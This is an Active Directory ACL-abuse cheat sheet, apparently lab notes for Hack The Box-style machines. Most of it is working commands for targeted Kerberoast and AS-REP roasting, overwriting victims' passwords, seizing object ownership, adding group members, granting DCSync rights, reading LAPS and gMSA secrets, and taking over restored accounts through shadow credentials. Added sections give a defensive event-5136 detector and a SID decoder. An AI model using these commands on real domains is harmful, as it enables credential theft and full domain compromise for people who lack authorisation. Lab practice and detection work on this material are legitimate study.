AD ACL


User-GenericWrite

You have GenericWrite on user

Targeted Kerberoast

We can set an SPN on the targeted user and then perform the usual Kerberoast attack.
# Add SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName -v 'what/ever'
# Check it was set: bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' get object TARGETEDUSER --attr servicePrincipalName

# Ask TGS
GetUserSPNs.py 'BOX.HTB'/'USER' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -request-user TARGETEDUSER -outputfile /tmp/hashes.kerberoast
# Or nxc ldap DC01.BOX.HTB -d 'BOX.HTB' -u 'USER' -p 'PASS' --kerberoast /tmp/hashes.kerberoast

# Remove SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName

# Crack
hashcat -m 13100 -a 0 /tmp/hashes.kerberoast /usr/share/wordlists/rockyou.txt  --potfile-path=HASHCATPOT
You can also use the targetedKerberoast tool, which automates this process:
it adds an SPN on every user the current account can write to, requests a TGS and finally removes the SPN it added.
git clone https://github.com/ShutdownRepo/targetedKerberoast.git /opt/git/targetedKerberoast
pip3 install -r /opt/git/targetedKerberoast/requirements.txt
python3 /opt/git/targetedKerberoast/targetedKerberoast.py -v -d 'box.htb' -u 'user' -p 'pass'

# If you get clock skew errors, sync your clock with the DC
# sudo rdate -n 10.129.75.247

Then crack the TGS hash with hashcat
hashcat -m 13100 /tmp/hash /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

Targeted AS-REP

Very close to the targeted Kerberoast method:
set the DONT_REQ_PREAUTH flag in the targeted user's userAccountControl, then perform the usual AS-REP roasting against that user.
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'COMPROMISEDACCOUNT' add uac TARGETEDACCOUNT -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to TARGETEDACCOUNT's userAccountControl

GetNPUsers.py 'BOX.HTB'/'COMPROMISEDACCOUNT' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -usersfile <(echo -e 'TARGETEDACCOUNT') -outputfile /tmp/hashes.asreproast -format hashcat
$krb5asrep$23$TARGETEDACCOUNT@BOX.HTB:xxxxxxxxxxxxxx

hashcat -m 18200 -a 0 /tmp/hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT

Enable user

This is not an attack by itself, but you can re-enable a disabled account
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' remove uac TARGETEDUSER -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from TARGETEDUSER's userAccountControl
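From the defender's side, the three edits above (transient SPN for targeted Kerberoast, DONT_REQ_PREAUTH set, ACCOUNTDISABLE cleared) all surface as directory-change audit events. The following is an added example, not from the original page: it walks constructed records shaped like Security event 5136 (ObjectDN, AttributeLDAPDisplayName, AttributeValue, OperationType, SubjectUserName) and reports the patterns; the field names, sample DNs and timestamps are assumptions.

```python
from datetime import datetime, timedelta
UAC_FLAGS = {0x2: "ACCOUNTDISABLE", 0x400000: "DONT_REQ_PREAUTH"}  # LDAP userAccountControl bits
ADD, DEL = "%%14674", "%%14675"  # event 5136 OperationType: value added / value deleted

def uac_diff(old, new):
    """(flags set, flags cleared) among the monitored bits between two userAccountControl values."""
    changed = old ^ new
    return ({n for b, n in UAC_FLAGS.items() if changed & new & b},
            {n for b, n in UAC_FLAGS.items() if changed & old & b})

def audit(events, window=timedelta(minutes=10)):
    """Walk 5136-style records in time order and return (objectDN, reason) findings."""
    findings, old_uac, pending_spn = [], {}, {}
    for e in sorted(events, key=lambda r: r["Time"]):  # stable sort keeps delete-before-add
        attr, value, dn = e["AttributeLDAPDisplayName"].lower(), e["AttributeValue"], e["ObjectDN"]
        if attr == "useraccountcontrol":
            # a modify is logged as the old value deleted, then the new value added: diff the pair
            if e["OperationType"] == DEL:
                old_uac[dn] = int(value)
            elif dn in old_uac:
                set_, cleared = uac_diff(old_uac.pop(dn), int(value))
                if "DONT_REQ_PREAUTH" in set_:
                    findings.append((dn, "pre-auth disabled by %s (AS-REP roastable)" % e["SubjectUserName"]))
                if "ACCOUNTDISABLE" in cleared:
                    findings.append((dn, "disabled account re-enabled by %s" % e["SubjectUserName"]))
        elif attr == "serviceprincipalname":
            # targeted Kerberoast leaves an SPN that appears and disappears within minutes
            if e["OperationType"] == ADD:
                pending_spn[(dn, value)] = e
            elif (dn, value) in pending_spn:
                added = pending_spn.pop((dn, value))
                if e["Time"] - added["Time"] <= window:
                    findings.append((dn, "SPN %s added and removed within %s by %s"
                                     % (value, e["Time"] - added["Time"], added["SubjectUserName"])))
    return findings

def rec(t, who, dn, attr, value, op):  # builds one constructed 5136-style record
    return {"Time": t, "SubjectUserName": who, "ObjectDN": dn,
            "AttributeLDAPDisplayName": attr, "AttributeValue": value, "OperationType": op}
T = datetime(2024, 1, 1, 12, 0)  # constructed timestamps and DNs
TARGET, DORMANT = "CN=targeteduser,CN=Users,DC=box,DC=htb", "CN=dormant,CN=Users,DC=box,DC=htb"
SAMPLE = [  # 66048 = NORMAL_ACCOUNT|DONT_EXPIRE_PASSWORD; +4194304 = DONT_REQ_PREAUTH; +2 = disabled
    rec(T, "compromised", TARGET, "userAccountControl", "66048", DEL),
    rec(T, "compromised", TARGET, "userAccountControl", "4260352", ADD),
    rec(T, "user", DORMANT, "userAccountControl", "66050", DEL),
    rec(T, "user", DORMANT, "userAccountControl", "66048", ADD),
    rec(T, "user", TARGET, "servicePrincipalName", "what/ever", ADD),
    rec(T + timedelta(minutes=2), "user", TARGET, "servicePrincipalName", "what/ever", DEL),
]
print(*audit(SAMPLE), sep="\n")
```

Feeding real 5136 events requires "Audit Directory Service Changes" to be enabled and the user objects to carry a write-audit SACL.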

User-GenericAll

GenericAll includes GenericWrite.
In addition to the GenericWrite actions, GenericAll lets you set the user's password.

Set Password

If you have GenericAll on a user, you can set that user's password.
(You probably want to try the GenericWrite methods first to retrieve the user's hash before you overwrite the password)

From Windows
net user robert FNUEOFNSIDsilfelifsef_1 /domain

From Linux
# With password
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123

# With NT HASH
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123

User-WriteOwner

You can set VICTIM's owner to USER;
as the owner, USER can then grant themselves rights on VICTIM.
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner VICTIM USER
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll VICTIM USER
#bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123

Group-WriteOwner

Change owner of “GROUP” to “USER”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'GROUP' 'USER'

Group-Owner

Grant “USER” genericAll right on “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'GROUP' 'USER'

Group-GenericAll

Add “USER” to group “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'GROUP' 'USER'

ReadLAPSPassword

Read the LAPS local administrator passwords
nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps

WriteDacl

Add any ACE you want, for example DCSync rights for USER on the domain
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add dcsync USER

ReadGMSAPassword

Retrieve gMSA account’s NT hash
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' -p 'PASS' get object 'GMSA01$' --attr msDS-ManagedPassword
nxc ldap BOX.HTB -u 'USER' -p 'PASS' --gmsa

WriteSPN

WriteSPN lets you write the servicePrincipalName attribute, so perform the targeted Kerberoast described above.

Reanimate-Tombstones

You can reanimate deleted objects, but you will probably also need rights on the destination OU.

Listing of deleted objects
ldapsearch -H 'ldap://BOX.HTB' -D USER@BOX.HTB -w 'Pototo_123' -b "DC=BOX,DC=htb" "(isDeleted=*)" -v -E pr=1000/noprompt -E '!1.2.840.113556.1.4.417'

Resolve objectSid
$ cat <<'EOF'|python3
import base64, struct
b = base64.b64decode("AQUAAAAAAAUVAAAAArr/UoEu+1C7Lcd+VQQAAA==")  # objectSid as printed by ldapsearch
# byte 0 = revision, bytes 2-7 = 48-bit big-endian authority, then little-endian 32-bit sub-authorities
print("S-%d-%d-%s" % (b[0], int.from_bytes(b[2:8], "big"), "-".join(str(struct.unpack("<I", b[i:i+4])[0]) for i in range(8, len(b), 4))))
EOF
S-1-5-21-1392491010-1358638721-2126982581-1109
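The one-liner trusts its input. As an added example (not from the original page) that generalizes it: a decoder that validates the revision byte, the sub-authority count and the blob length, accepts both the base64 text ldapsearch prints and raw bytes from an LDAP library, and converts back the other way. The base64 value is the one shown above; the function names are assumptions.

```python
import base64
import struct

def sid_to_str(blob):
    """Binary objectSid -> 'S-1-<authority>-<sub>...'; rejects malformed blobs."""
    if isinstance(blob, str):  # ldapsearch prints binary attributes base64-encoded
        blob = base64.b64decode(blob)
    if len(blob) < 8 or blob[0] != 1:
        raise ValueError("not a revision-1 SID")
    count = blob[1]  # number of 32-bit sub-authorities, so the blob is 8 + 4*count bytes
    if len(blob) != 8 + 4 * count:
        raise ValueError("length %d does not match sub-authority count %d" % (len(blob), count))
    authority = int.from_bytes(blob[2:8], "big")  # 48-bit identifier authority, big-endian
    subs = struct.unpack("<%dI" % count, blob[8:])  # sub-authorities are little-endian
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs)

def str_to_sid(text):
    """'S-1-5-21-...' -> binary objectSid, the form an LDAP library wants in a filter."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a revision-1 SID string")
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def domain_sid(text):
    """Drop the RID (last sub-authority) to get the domain SID used above with dacledit -target-sid."""
    return text.rsplit("-", 1)[0]

SAMPLE_B64 = "AQUAAAAAAAUVAAAAArr/UoEu+1C7Lcd+VQQAAA=="  # the objectSid value shown above
if __name__ == "__main__":
    sid = sid_to_str(SAMPLE_B64)
    print(sid, "->", domain_sid(sid))
```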

Then use dacledit to check the ACEs USER holds on the object with the given SID
dacledit.py -action 'read' -rights-guid 'bf9679c0-0de6-11d0-a285-00aa003049e2' -principal 'USER' -target-sid 'S-1-5-21-1392491010-1358638721-2126982581' "BOX.HTB"/"USER" -k -no-pass

PowerShell commands to find the deleted object by SID and restore it
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects | Restore-ADObject

If you have control over the destination OU, you can leverage this access to gain control over the restored account.
Example for accounts that do not have adminCount set (protected accounts get their ACL reset by SDProp)
# Give ourselves FullControl over the OU
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'USER' -target-dn 'OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k

# Check that we now have rights over the targeted account
dacledit.py -action 'read' -principal 'USER' -target-dn 'CN=targeteduser,OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k

# Then leverage those rights, for example with shadow credentials
certipy shadow auto -username USER@box.htb -p Pototo_123 -account targeteduser -dc-ip 10.129.123.82 -ns 10.129.123.82